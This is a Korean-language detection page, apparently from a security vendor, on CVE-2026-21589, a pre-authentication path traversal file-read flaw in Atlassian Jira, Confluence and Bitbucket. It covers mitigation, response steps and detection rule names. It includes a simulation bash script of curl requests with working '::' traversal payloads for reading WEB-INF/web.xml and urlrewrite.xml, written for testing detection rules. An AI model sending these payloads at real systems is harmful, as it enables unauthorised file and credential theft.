CVE-2026-21589: Atlassian Jira 및 Confluence 사전 인증 파일 읽기 취약점
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
CVE-2026-21589 사전 인증 임의 파일 읽기 취약성은 Jira, Confluence, Bitbucket을 포함한 여러 Atlassian 제품에 영향을 미칩니다. 공격자는 경로 조작 취약점을 악용하여 :: 구분자를 통해 애플리케이션 웹 루트 내의 민감한 파일에 접근할 수 있습니다. 성공적인 악용은 평문으로 된 Atlassian Crowd 자격 증명을 노출시킬 수 있으며, 이는 신원 관리 시스템의 관리자를 위험에 빠뜨릴 수 있습니다.
조사
연구원은 atlassian-plugins-webresource JAR에서 취약성과 패치된 릴리스를 비교하여 분석했습니다. 특정 함수가 이중 콜론을 슬래시로 변환하여 경로 탐색이 가능하게 한다는 것을 발견했습니다. 마지막에 슬래시가 있는 특정 리소스 플러그인을 대상으로 함으로써 연구원들은 WEB-INF/web.xml and crowd.properties.
완화
Atlassian은 모든 영향을 받는 제품에 대한 보안 자문 및 수정 릴리스를 발표했습니다. 조직은 Bitbucket 10.5.1, Confluence 10.2.19, Jira 11.3.12와 같은 권장 수정 버전으로 업그레이드해야 합니다. 이중 콜론, 인코딩된 문자 및 의심스러운 리소스 요청과 관련된 경로 탐색 패턴을 탐지할 수 있는 WAF 규칙을 배포하면 추가 보호를 제공할 수 있습니다.
대응
URL에서 :: 에 대한 의심스러운 경로 탐색 시도가 탐지되면, 사고 대응자는 즉시 표적이 된 Atlassian 인스턴스를 식별하고 격리해야 합니다. 무단 계정 생성, 권한 상승 또는 다른 비정상적 활동에 대해 Atlassian Crowd를 검토하세요. WEB-INF 리소스를 대상으로 하는 요청을 감사하고 구성 파일을 통해 잠재적으로 노출된 자격 증명은 교체하세요. crowd.properties.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
관리자에게 추가된 가능성 있는 Jira 사용자 (웹 서버 통해)
생성된 가능성 있는 Jira 사용자 (웹 서버 통해)
가능성 있는 CVE-2026-21589 (Atlassian Jira, Confluence, BitBucket 사전 인증 임의 파일 읽기) 악용 시도 (웹 서버 통해)
경로 탐색을 통한 Atlassian 제품 임의 파일 읽기 [웹 서버]
시뮬레이션 실행
-
공격 내러티브 & 명령: 공격자는 Atlassian 인스턴스를 의심하며 정찰을 수행하고 있습니다. 그들은 CVE-2026-21589에 대한 알려진 악용 패턴을 사용하고 있으며, 이중 콜론 (
::)를 사용하여 웹 인터페이스를 통해 파일 시스템을 탐색하는 특정 우회기법을 활용하고 있습니다. 목표는web.xml을 탈취하여 내부 애플리케이션 구조를 파악하고 추가 평면 이동을 위한 자격 증명을 수집하는 것입니다. -
회귀 테스트 스크립트:
#!/bin/bash # Atlassian 경로 탐색 탐지 규칙을 유발하는 시뮬레이션 스크립트 TARGET_URL="http://localhost" echo "[+] 시뮬레이션 시작: Atlassian 경로 탐색" echo "[*] 페이로드 1 시도 중: Jira web.xml 탐색..." curl -s -I "$TARGET_URL/download/resources/jira.webresources:color-picker-popup/images/..::..::..::..::..:WEB-INF::web.xml" echo "[*] 페이로드 2 시도 중: Confluence web.xml 탐색..." curl -s -I "$TARGET_URL/s/1/_/download/resources/com.atlassian.confluence.plugins.dashboard-actions/images/..::..::..::..::..::..::..:WEB-INF::web.xml" echo "[*] 페이로드 3 시도 중: Bitbucket urlrewrite.xml 탐색..." curl -s -I "$TARGET_URL/s/1.0/_/download/resources/com.atlassian.bitbucket.server.bitbucket-webpack-INTERNAL:avatar/avatar/..::..::..::..::..:WEB-INF::urlrewrite.xml" echo "[+] 시뮬레이션 완료. SIEM에서 알림을 확인하세요." -
정리 명령:
# 시스템에 영구적인 변경 사항은 없으므로, 정리가 필요하지 않습니다. echo "[+] 정리 불필요. 시뮬레이션은 비파괴적이었습니다."